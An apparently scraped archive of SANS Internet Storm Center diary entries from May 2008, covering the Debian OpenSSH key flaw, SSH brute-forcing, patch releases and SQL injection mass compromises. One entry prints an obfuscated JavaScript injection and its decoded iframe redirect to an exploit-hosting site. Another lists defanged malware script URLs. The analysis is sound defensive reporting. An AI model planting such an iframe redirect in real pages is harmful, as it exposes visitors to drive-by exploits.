At Microsoft's BlueHat briefing earlier in the month there were great presentations and discussion of information relative to tomorrow's exacerbation of today's vulnerability/exploit trends. Along the line of information presented, I expect we all know, from reading vulnerability announcements, analysis, and public exploit work, how talented the researchers are and what the trends are. YMMV from mine, but my mileage got a boost during Cesarr Cerrrrudo's Token Kidnapping presentation, which had an impact beyond what the title of the presentation indicates, and beyond what his HITBSecConf 2008 Dubai Token Kidnapping PDF has. Don't let the "title" of the paper throw you off ( ; ^ ).

Where the BlueHat rubber met the road

The BlueHat panel assembled by MS for discussion of the vulnerability research economy that has developed over the last few years did a great job. I can't summarize the whole panel discussion, nor does it look like the information will be made available, but what I want to mention here relates to mileage. (I hope that when they're released, the MS BlueHat podcast "interviews" of the presenters and panelists work contain the presenter's actual presentation information for your own evaluation of the storm ("actual presentation" versus the mentioned podcast "interviews").

Dan Kaminsky presented data on code development and reasonable current and future numbers of vulnerabilities that can be expected. The discussion had great information on whoi$ paying how much for the vulnerability research results. The panelists also shared quite a bit of "vulnerability economy" information that I haven't seen summarized in any one place, including discussion of how researchers get paid, and by who.

At the end of the discussion, it was apparent that vendors are only going to buy/receive a percentage of discoverable (and exploitable) vulnerabilities via the vulnerability research economy, or from altruistic vulnerability researchers. And in the "vulnerability economy" that the panel described, Vendors lose out bidding for research results to "private" groups who keep the vulnerability information for "private" use. I note the discussion of "private" groups purchasing vulnerability research remained civil.

In Summary

There have been many trend reports by many great research and analysis groups discussing vulnerabilities, information warfare and criminal activity attacks and trends. When I consider those reports, Dan Kaminsky's BlueHat presentation numbers, and the "vulnerability economy" panel discussion information, I'm left with an obvious conclusion, the ever increasing number of unreported vulnerabilities being turned into 0-days is not going to slow down soon, it's increasing rapidly, from the increasing number of "private" groups focused on information warfare and criminal activity. And as always, should you accept the mission, detecting successful intrusions is the job.

Discussing indicators of exploitation and indentifying complex vectors is typically easier when it's an information sharing effort. This is something SANS, the ISC Handlers, and ISC participants have been doing for quite a few years. So when those Deja-Vu moments occur, while you're dealing with the vendors, consider getting assistance and participate in getting the information out publically as soon as possible, become an ISC participant, drop us a line (Contact) about what's happening to your systems.

Bluehat (Thanks SANS & MS)

Microsoft BlueHat Security Briefings: Spring 2008 Sessions

BlueHat Security Briefings Blog - with links to presenters sites

Bluehat Vulnerability Economy Panel - Panelists included:

Terri Forslof
Manager of Security Response, Tipping Point Technologies

Adam Shostack
Senior Security Program Manager, Microsoft

Jeremiah Grossman
Founder & CTO, WhiteHat Security

Dan Kaminsky
Director of PenTest, IOActive

Charlie Miller
Principal Analyst, Independent Security Evaluators

Researchers Papers

Token Kidnapping PDF, Cesarr Cerrrrudo, Argeniss

I believe the related MS info is Microsoft Security Advisory (951306)- Vulnerability in Windows Could Allow Elevation of Privilege

For a non-Bluehat correlation see the recent "Application-Specific Attacks: Leveraging the ActionScript Virtual Machine" by Mark Dowd, IBM Global Technology Services, X-Force Researcher.



Published: 2008-05-17

XP SP3 Issues

According to an article published by Information Week, the newly released XP SP3 is causing systems to blue screen (aka BSOD) on AMD based systems.  Microsoft and HP seem to think its center around the Power Managment feature.  Here is an example of a message you might receive:

A problem has been detected and Windows has been shut down to prevent damage to your computer...
Technical information:
*** STOP: 0x0000007E (0xC0000005, 0xFC5CCAF3, 0xFC90F8C0, 0xFC90F5C0

 HP has posted a work around that has you go boot into Safe Mode and disable the Intel Power Management. 

Apparently there are other problems with SP3 according to the article.  If you have deployed XP3 and have encountered the BSOD or other major issues with SP3 please let us know.   If you haven't deployed XP3 and your waiting, I'd like to know the reasons behind this as well.  Remember there are some caveats that you need to be aware before deploying this service pack.   Check out this ISC article for more information.


Published: 2008-05-17

Disaster donation scams continue

Now that you are done regenerating SSH keypairs and SSL certificates on your Debian and Ubuntu machines, we return you to our usual programming.  Oh, wait, we have an oldie but goody that has returned.  Ever since Hurricane Katrina back in 2005 (see http://isc.sans.org/diary.html?storyid=643), we've seen after every significant natural disaster, the scammers start registering domains and try to collect donations.  The last 2 weeks have seen Cyclone Nargis hit Myanmar and then the big earthquake in China and as expected, we've seen registration of domains related to those disasters.  These may not all be scams, but we repeat the advice we first gave nearly 3 years ago, if you wish to donate money to help the victims of these disasters, we suggest you stick to the established charities that you have a relationship with (such as the Red Cross or Church World Service or the like) through their main web pages or the phone.


Published: 2008-05-16

INFOcon back to green

The Debian/Ubuntu SSL problem by now has sufficient media attention. Once the big security firms raise their threat level indicators, we at SANS ISC can go back to green :). 

Debian Wiki has a good (and evolving) write-up on problems and resolutions: wiki.debian.org/SSLkeys

As a reminder, all systems that contain Debian/Ubuntu generated cryptographic key material are potentially vulnerable. You need to check those "authorized_keys" files for SSH on all platforms, not just on Debian.


Published: 2008-05-15

INFOCon yellow: update your Debian generated keys/certs ASAP

As you can see, we raised the INFOCon level to yellow. The main idea behind INFOCon is to protect the Internet infrastructure at large, and the development on automated scripts exploiting key based SSH authentication looks like a real threat to SSH servers around the world (any SSH server using public keys that were generated on a vulnerable Debian machine – meaning – the keys had to be generated on a Debian machine between September 2006 and 13th of May 2008).

Scripts that allow brute forcing of vulnerable keys (see this as rainbow tables for SSH keys) are in the wild so we would like to remind all of you to regenerate SSH keys ASAP.

Please keep in mind that SSL certificates should be regenerated as well. This can be even more problematic if you had your certificates signed since you'll have to go through this process again (and possibly pay money again).

More information is available in our previous diaries:






Published: 2008-05-15

Debian and Ubuntu users: fix your keys/certificates NOW

Couple of days ago Swa posted a diary about a critical Debian/Ubuntu PRNG security vulnerability.

Today Matt wrote in to let us know that H D Moore posted a web page containing all SSH 1024, 2048 and 4096-bit RSA keys he brute forced.

It is obvious that this is highly critical – if you are running a Debian or Ubuntu system, and you are using keys for SSH authentication (ironically, that's something we've been recommending for a long time), and those keys were generated between September 2006 and May 13th 2008 then you are vulnerable. In other words, those secure systems can be very easily brute forced. What's even worse, H D Moore said that he will soon release  a brute force tool that will allow an attacker easy access to any SSH account that uses public key authentication.

But this is not all – keep in mind that ANY cryptographic material created on vulnerable systems can be compromised. If you generated SSL keys on such Debian or Ubuntu systems, you will have to recreate the certificates and get them signed again. An attacker can even decrypt old SSH sessions now.

The Debian project guys released a tool that can detect weak keys (it is not 100% correct though as the blocklist in the tool can be incomplete). You can download the tool from http://security.debian.org/project/extra/dowkd/dowkd.pl.gz.

The bottom line is: this is very, very, very serious and scary. Please check your systems and make sure that you are both patched, and that you regenerated any potentially weak cryptographic material.




Published: 2008-05-14

War of the worlds?

There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.

Exploiting of such vulnerabilities became relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at http://isc.sans.org/diary.html?storyid=4294, which was probably used for a lot of SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground, one such tool in use with botnets was analyzed by Joe at SecureWorks, http://www.secureworks.com/research/threats/danmecasprox/).

While the motive for this is more or less standard – steal credentials or virtual goods so you can convert/sell that for real money (Mike and Steven from Shadowserver posted very nice articles at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507 and http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513) - while analyzing one such site today I saw an interesting rant, presumably by the author.

The site has already been mentioned multiple times (www.ririwow.cn, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:

"This is a mass invasion.        Safeguard the motherland's dignity!
I love my motherland!
Please understand that I
PLEASE SEND EMAIL TO kiss117276@163.com "

(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from pauldotcom.com. Paul analyzed a compromised site which had this piece of JavaScript inserted:

n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}

In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting exploit only if that is not true. So the rant might really be from the author, after all since the code is attacking all non-Chinese machines. Are we getting more serious with this or the bottom line is still (and only) information stealing and money.




Published: 2008-05-13

Microsoft office file block & MOICE

Microsoft introduced the ability to block file formats to the different  programs in office and safer ways to open suspect files about a year ago.

The file blocking is not based on the file extension but on the actual format (so renaming a rich text file (.rtf) to a .doc won't get around the restriction). Unfortunately it's set by making changes in the registry and perhaps worse: it's a blocklist instead of a list of allowed file types. Still if you never intend to open e.g. rtf files, you could block it.

Microsoft Office Isolated Conversion Environment (MOICE) is an alternate way to open office files away from the actual tool. Use it instead of the real thing if you cannot resist opening that unsolicited attachment promising whatever it promises.

It seems these tools aren't widely used, hence drawing a bit more attention to them might help protect a few in the end.

Swa Frantzen -- Gorilla Security


Published: 2008-05-13

OpenSSH: Predictable PRNG in debian and ubuntu Linux

Debian and Ubuntu Linux users should look into their OpenSSH setup. It turns out the used PRNG (Pseudo Random Number Generator) used was predictable.

Remember patching isn't enough, you need to regenerate keys generated on these machines! Including those used in SSL certificates (X.509).

Worse: even good keys apparently can be exposed due to this. Quoting from the Debian reference below:

"Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation."

So merely using your (good) keys on an affected machine might be enough to get the key itself compromised.

Swa Frantzen -- Gorilla Security


Published: 2008-05-13

May 2008 black tuesday overview

Overview of the May 2008 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS08-026 Multiple vulnerabilities allow code execution when opening a malicious file. Files opened with word and edited with word in outlook are of particular concern.
Replaces MS08-009.

KB 951207 No publicly known exploits Critical Critical Important
MS08-027 The fixed vulnerability is an input validation failure leading to memory corruption and code execution.
Replaces MS08-012 and MS07-037.

KB 951208
No publicly known exploits Critical Critical Important
MS08-028 The fixed vulnerability is an input validation failure leading to a buffer overflow and allowing code execution.
Jet database engine

KB 950749

SA 950627
Actively exploited Critical PATCH NOW Important

Microsoft onecare, antigen, defender and forefront use the malware protection engine. It suffers from multiple input validation failures leading to a Denial of Service.

Microsoft malware protection engine


KB 952044
No publicly known exploits Moderate Less Urgent Important


We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- Gorilla Security


Published: 2008-05-12

Adobe Releases Security Updates

Last week, Adobe released security updates that should be deployed as a part of your normal patch procedures.  The updates available at Adobe.com address vulnerabilities which could cause Adobe Reader or Acrobat applications to crash or even allow an attacker to take control of the affected system.   More details about this set of updates is available at http://www.adobe.com/support/security/bulletins/apsb08-13.html.

I recommend that this update be added into the mix of testing and deployment along with the Windows Updates to be released on Tuesday.  MacOSX users should also update to either Acrobat 7.1.0 or version 8.1.2 at the earliest convenience as well.


Published: 2008-05-12

Brute-force SSH Attacks on the Rise

Greetings everyone.  Just a bit of a reminder that many colleges and universities are done for the spring semester, and the K12s are right around the corner.  As most of you already realize, this means that a number of very intelligent kids and young adults are soon to have far more free time on their hands (and less adult supervision during the normal working hours for their parents).  So I expect that there will be a bit of an increase of attacks and other general noise from outside of corporate or campus network as we have observed in prior years.

In that frame of mind, there has been a significant amount of brute force scanning reported by some of our readers and on other mailing lists.  And there does appear to be a bit of a spike reflected in the port 22/tcp sources in the past week in the Dshield data.

Jim Owens and Jeanna Matthews of Clarkson University released a paper at the Usenix LEET ‘08 conference which investigates current methods and dictionaries used by attackers of SSH in the past several months.  The paper shows some evaluations of common techniques used to defend against brute force attacks that are worth reading to some.

From the most recent reports I have seen, the attackers have been using either ‘low and slow’ style attacks to avoid locking out accounts and/or being detected by IDS/IPS systems.  Some attackers seem to be using botnets to do a distributed style attack which also is not likely to exceed thresholds common on the network.

So be warned that there does appear to be a bit more activity involving SSH and weak or otherwise guessable passwords.  This would be a great time to do some investigation on your local network to see what servers have SSH open to the world on the default port, and may need to have its security posture reassessed.  You might want to try using a few of the techniques discussed in the paper by Owens and Matthews such as

  • Using the host based security tools of DenyHosts, fail2ban, or BlockHosts in conjunction with TCP-Wrappers to block access to servers across your organization.
  • Disable direct access to the root account.
  • Avoid using easily guessed user names such as only a first name or a last name.  (Side Note: Academia will need to look into the age old policy of publishing an online directory of account holders before this one will have much of an effect.)
  • Enforce strong passwords or use public key authentication in place of passwords (multi-factor or public key is the preferred method especially for systems which contain sensitive data) .
  • Generally reduce the number of publicly accessible services through iptables or similar host based security measures in addition to network firewalls.  (think defense in depth.)

You might note that there is one defense technique that was not even mentioned in the paper, or was not recommended by me.  That technique is to lock accounts after X number of failed login attempts.  As I work in a similar environment as the authors, I can tell you that this technique has numerous issues when working with academia.  First and foremost, the potential for creating a denial of service issue must be weighed against the potential of attackers guessing the right password before IT Security notices.  The likelyhood of having a student take out their frustration for a non-IT related issue on a professor or an ex-boyfriend or girlfriend is actually very significant.  Additionally, having a single sign-on infrastructure used from Web Applications, Unix based apps and interface, and windows based services mean you have to do significant synchronization of information to make this technique effective against distributed and/or slow attacks.    Your mileage for using this  technique may vary and could be more valid in your environment.

Thanks to all of the readers who have already sent in their observations to us today.  :-)

Update 1:
One of our handlers, Jim, pointed me to the DenyHost stat site located at http://stats.denyhosts.net/stats.html.  As already mentioned, this does appear to be a significant new trend of which we all should be aware.

Another one of our readers sometimes gives advice/consults for an organization which today was having problems with a server denying access to anyone attempting to connect. The reason was that Sshd was denying all connections due to too many failed login attempts.  It was recommended that internal servers could use the default port, but external facing hosts which have a need for ssh should use a non-standard high port.  Yes, itt is a form of security by obscurity, but it does defeat brain-dead brute force attacks.


Published: 2008-05-11

Mass File Injection Attack

We received a report from Mike this afternoon about a couple of URLs containing a malicious JavaScript that pulls down a file associated with Zlob.  If you do a google search for these two URLs, you get about 400,000 sites that have a call to this Javascript file included in them now.  The major portion of the sites seem to be running phpBB forum software.

If you have a proxy server that logs outbound web traffic at your site, you might want to look for connection attempts to these two sites.  Internal clients that have connected may need some cleanup work.  Another preventive step would be to blocklist these two URLs.



Published: 2008-05-09

Thunderbird is out!

Wait, before I hand the Big Red Internet Button over to Mike Poor,  (one press, and well, you know what happens) I just wanted to let everyone know that Thunderbird is out.  Right here is a link to the security release notes for this latest version.  Just two it looks like.

So, okay, I'm turning it over to Mike now.  Good luck all of you!


Joel Esler



Published: 2008-05-08


I stole the headline directly from Mozilla.  I am writing this diary entry for our readers in Vietnam.  Apparently the Vietnamese Language pack for Firefox 2 has been compromised.  About 16,667 downloads of the Vietnamese Language Pack has been downloaded since November of 2007, so the impact may or may not be significant.  So be wary.  If you have downloaded the Vietnamese Language Pack, you should know who you are, go to Mozilla's website and read all about it.


Joel Esler



Published: 2008-05-07

OSSEC 1.5 released

Okay, so we're almost a week late in acknowledging that our friend, Daniel Cid has released the latest version of his OSSEC HIDS (with help from others listed in the announcement).  The new release adds a number of new logs that can be monitored, and some new features and performance improvements (particularly to the windows agent).  You can find the announcement at http://www.ossec.net/main/ossec-v15-released and you can download from here.  Our thanx to Daniel for continuing to develop one of my favorite tools.



Published: 2008-05-07

More on automated exploit generation

We've done a couple of stories resulting from the release of the APEG paper a couple of weeks ago, and this story is by no means an attempt to downplay the significance of the threat or suggest that you not employ the countermeasures discussed in previous stories.  That said, when I first heard about it, my thought was, that sounds like an interesting result, but the hype is over the top.  Yes, it is a significant result, but "the sky is not falling."  I happened across a post on Halvar Flake's blog that explains it better than I could, so take a look for yourself.



Published: 2008-05-06

SQL Injection Worm on the Loose (UPDATED x2)

A loyal ISC reader, Rob, wrote in to point us at what looks to be a SQL Injection worm that is on the loose.  From a quick google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier.  Right now we can't speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites.  It looks like the infection of user machines is by Real Player vulnerabilities that seem more or less detected pretty well.

The details, the script source that is injected into webpages is hxxp://winzipices.cn/#.js (where # is 1-5).  This, in turn, points to a cooresponding asp page on the same server.  (i.e. hxxp://winzipices.cn/#.asp).  This in turn points back to the exploits.  Either from the cnzz.com domain or the 51.la domain.  The cnzz.com (hxxp://s141.cnzz.com) domain looks like it could be set up for single flux, but it's the same pool of IP address all the time right now.  hxxp://www.51.la just points to 51la.ajiang.net which has a short TTL, but only one IP is serving it.

Fair warning, if you google this hostnames, you will find exploited sites that will try and reach out and "touch" you... even if you are looking at the "cached" page.  Proceed at your own risk.

UPDATE: We're also see this website serving up some attacks in connection with this SQL Worm (hxxp://bbs.jueduizuan.com)

UPDATE x2: As usual, the good folks at ShadowServer had a good write up on the details of everything after the SQL injection (i.e. what malware gets dropped, IPs involved, etc).

John Bambenek / bambenek \at\ gmail /dot/ com


Published: 2008-05-06

Industrial Control Systems Vulnerability

While a day does not go by without many public announcements of vulnerabilities in consumer and business software, it is rather rare when we hear about something wrong with software that is used to monitor or control industrial systems.  Commonly called SCADA (Supervisory Control And Data Acquisition) or PCS (Process Control System), these are the systems that monitor and operate oil and gas refineries, large manufacturing plants, assembly lines, railroads, electrical grids, and countless other industrial processes.

Core Security announced yesterday that there is a Denial of Service vulnerability in the Invensys Wonderware InTouch SuiteLink service running in Windows operating systems, specifically slssvc.exe. According to Core, this vulnerability "could allow an un-authenticated remote attacker with the ability to connect to the SuiteLink service TCP port to shutdown the service abnormally by sending a malformed packet. Exploitation of the vulnerability for remote code execution has not been proven, but it has not been eliminated as a potential scenario."

According to Wonderware's website, "Wonderware is the leading supplier of industrial automation and information software solutions. One third of the world’s plants run Wonderware software solutions. Having sold more than 500,000 software licenses in over 100,000 plants worldwide, Wonderware has customers in virtually every global industry — including Oil & Gas, Food & Beverage, Utilities, Pharmaceuticals, Electronics, Metals, Automotive and more."  It's no wonder that a vulnerability in their monitoring software might be something the bad guys would be very interested in.

DHS (National vulnerability database) rates this one pretty high and says that the vulnerability "Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation, Allows unauthorized disclosure of information, Allows disruption of service."    Our advice:   Patch now.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-05-06

Windows XP Service Pack 3 Released

Microsoft, it appears, has just released Windows XP Service Pack 3.  For the most part, it is a bundle of all the updates since Service Pack 2, but there are some key differences.  First, the big gotcha:

If you are an IE 6 user, SP3 will simply updated your IE 6 installation.  You will continue to be able to upgrade to IE 7 as an option.

If you are an IE 7 user, it will update your IE 7 installation.  HOWEVER, you will NOT be able to go back to IE 6 after applying this service back.

If you are an IE 8 (beta) user, you will need to uninstall IE 8, apply the service pack, and then reinstall IE 8.

This link has a list of all the Knowledge Base articles that this service pack addresses.  Some of the bigger notes is that it does retrofit some of the Vista functionality into XP, namely in the area of Network Access Protection, Black Hole Router Detection, enhanced security for administrator and service policy entries (basically some better default settings) and a kernel mode crypto driver.  Additionally, some of the "optional" updates released since SP2 will be installed with SP3 (MMC 3.0, MXSXML6, WPA2 support, etc).

The good news is that TechNet provides installation media that can be used to slipstream install the service pack so workstations can be updated off the net.

John Bambenek / bambenek \at\ gmail /dot/ com



Published: 2008-05-05

PHP 5.2.6 out w/ security updates

PHP has announced the release of 5.2.6 which fixes 6 security bugs and a handful of other issues.  Some of the research is still ongoing about how important some of these security bugs are, but they do include a stack overflow and some others that could be nasty depending on how extensive the vulnerability is.  It includes over a 100 or so normal bug fixes so it is probably time to upgrade your PHP installations even if the security issues are non-events.

John Bambenek, bambenek /at gmail \dot\ com


Published: 2008-05-05

Defenses Against Automated Patch-Based Exploit Generation

Last month, we reported on research that shows it is possible to create exploits from reverse engineering patches as they come out and this process can be automated.  At that time, I didn't have alot to say about how to defend because I hadn't thought about the problem enough yet... I've had some time now.

Encrypting Patches

The paper mentions encrypted patches so that distribution of the patch could still take some time but they send out the decryption key simultaenously allowing the patch to be applied the same time around the globe.  This would, in theory limit the window of opportunity for a hacker to reverse engineer the patch, get a working exploit, and start attacking the world.  The problem with this is that the delay from the time of releasing the patch is not caused from the rolling cycle of downloads, but from the need to reboot systems after a patch is applied (most of the time).  In short, a system may still have the key to decrypt a patch, but it would not be applied until either the user rebooted the machine or at some default time when a reboot is acceptable (i.e. 3am).  The chief problem is the need to reboot which is a significant business disruption.  Encrypting patches wouldn't fix this problem, it just creates another layer of the patching process.

Patches that Don't Require Reboot

This particular defense is for OS vendors only (and one vendor in particular).  Patches that require a reboot must inevitably result in delaying the application until a maintenance window.  If patches can be applied without incurring downtime, particularly among end-user workstations, this allows patches to be pushed out and applied as soon as they are available.  This would go along way to closing the window of opportunity when a patch is out and when the patch is applied.  Some patches, obviously, must entail a reboot, but as many patches as possible should be developed in such a way to minimize the need to reboot.

The Renewed Need for Workarounds

This defense is mostly on us (the Internet Storm Center) and the security community in general.  For some time, workarounds have been less necessary because patching has been relatively easy to handle.  The need to go significant periods of time before patching has only occurred a handful of times in the past few years.  If the patch window is gone, that requires us to renew the efforts to find quick "workarounds" to limit the exposure of machines during the vulnerable period.  Some patches will require reboots and there will be no way around that.  We need to find defenses to allow people to protect themselves in the meantime.

Configuration Management

The last piece of the puzzle, a defense available to the people in the trenches, is centralized configuration/patch management.  In part, this follows from our diary from yesterday on configuration management.  If we get out hotfixes, registry changes, killbits, or any other defense, centralized configuration management allows for the quick deployment of these minor protective changes that will allow you to "limp along" until a patch can be applied.  The important note about configuration management is that deploying a solution, especially if it manages everything in your environment, makes that configuration management solution that absolute most important system in your environment, even more important than those that house trade secrets, etc.  A configuration management system becomes a "single point of 0wnership" that allows an attacker to take direct control over not one machine, but an entire organization whole and entire.  Everything has its costs and benefits, and as long as you control the risks of centralized configuration management, the benefits certainly make it worth it.  Protect the keys to the kingdom.

Comments?  Send em along.

John Bambenek / bambenek \at\ gmail /dot/ com


Published: 2008-05-04

How Configuration Management supports Systems Security

How do you know if what is in various configuration files is what is supposed to be there?  Did a hacker break-in and add some entries?  Did a system administrator accidentally change a file?  Did a security administrator make a mistake when modifying multiple lines in a firewall policy?  And how do you easily restore what should be there?

File integrity analysis tools, like Aide, Samhain and Tripwire can be configured to let you know that a file has changed but they don't correct the change.

Version control systems, like RCS, CVS and SVN, give you the ability to see when changes where made to a file and what changes were made at those times.  You can easily rollback to a prior version of a file if needed.

System configuration automation tools like cfengine and Puppet allow you to define configurations for specific servers, or classes of servers, and ensure that the related software and configuration files exist on the servers and are the correct versions.  If someone edits a configuration file manually on one of the servers and changes it from the expected contents, cfengine and puppet can detect the change and restore the correct file contents from an associated version control system repository.

We use Kickstart to build all our new Linux servers, quickly and repeatedly with our standard minimal footprint and then we use Puppet to  install the specific software required for that server, be it a web server, database server, VPN gateway, or other.

The tools listed above are predominantly for Linux servers, and most are open-source; this happens to be the environment that I work in and am most familiar with.

What are other version control systems or system configuration automation tools that you use in your environments?  Send in answers and I'll update this diary with people's responses.

David Goldsmith
SANS / ISC Handler


Published: 2008-05-03

Windows Vista Update Causing Loss of Audio on Some Systems

According to an article at Channel Web a recent update offered for a driver update for IDT (Formerly Sigmatel)'s high definition sound is causing problems for Dell Users that have installed it.  

"Should you see this update appear, *do not* install it," warned 'Chris B', a Dell (NSDQ:Dell) Digital Life Liason, in a Thursday forum post.

The update is called IDT High Def Codec and was reported to be one of the drivers that held up the release of SP1 for Vista back in February.  If you have a Dell computer and have not yet installed Vista SP1, you may want to take a look at the full article.


Thanks to our faithful contributer of comedy and serious content, Roseman. 


Published: 2008-05-02

Hi, remember me?...

Ever read through your spam sometimes to see what's popular? Of course you may also get a fresh serving of malware, which makes it very worthwhile. "Hi, remember me?..
new fotos(archived) you asked ;))
Angella O."

Well, no I don't remember an Angella that I have met recently, particularly not someone who might send me photos. But I'll bite. A simple wget scores me an exe. Virustotal results are depressingly consistent. 4/32.

AntiVir     2008.05.02     TR/Crypt.XPACK.Gen
CAT-QuickHeal     9.50     2008.05.01     (Suspicious) - DNAScan
eSafe     2008.04.28     Suspicious File
Webwasher-Gateway     6.6.2     2008.05.02     Trojan.Crypt.XPACK.Gen
Additional information
File size: 167936 bytes
MD5...: cb1de4847ca840f8837fc8381ec6b0cb
SHA1..: 26c018e4968e6dc092d5389759e939f741bb66b3

So, only generic detection when the file was first seen, how about 12 hours later? Nope, same results.

Adrien de Beaupré
Bell Canada



Published: 2008-05-01

Windows Detours

Another one of those Windows tools you wished you had heard about yesterday!

Ever wish you could log any call to a specific Win32 API? Enter detours, it can hook into a process, and log any everything. Lets not stop there, it can intercept arbitrary function calls! Believe it or not detours has been around since 1999, described here  and  here. The official description is that detours can instrument and extend existing operating system and application functionality. Think about it...

Adrien de Beaupré
Bell Canada

Thanks Robert!


Published: 2008-05-01

Windows XP SteadyState

One of those Windows tools you wished you had heard about yesterday!

Ever wish your Windows XP computer could return the way it was when it worked correctly? That would be great, right? We can all recall some point when a particular system worked just right. Enter a utility from Microsoft that does just that, and more than a 'System Restore'. It is called SteadyState and it can retain a golden image and revert to that state at will. It is designed to lock down shared computers that do not have a full time sysadmin, however it can be used in a number of scenarios. VMs are not always the environment of choice for malware researchers for example. URL is here.

Adrien de Beaupré
Bell Canada

Thanks Robert!


Published: 2008-05-01

ISC Podcast Episode Number 3

Hey all, we just put out Episode Number 3 for the Internet Storm Center Podcast.  Available via iTunes here, and for you non-iTunes users, here.



Joel Esler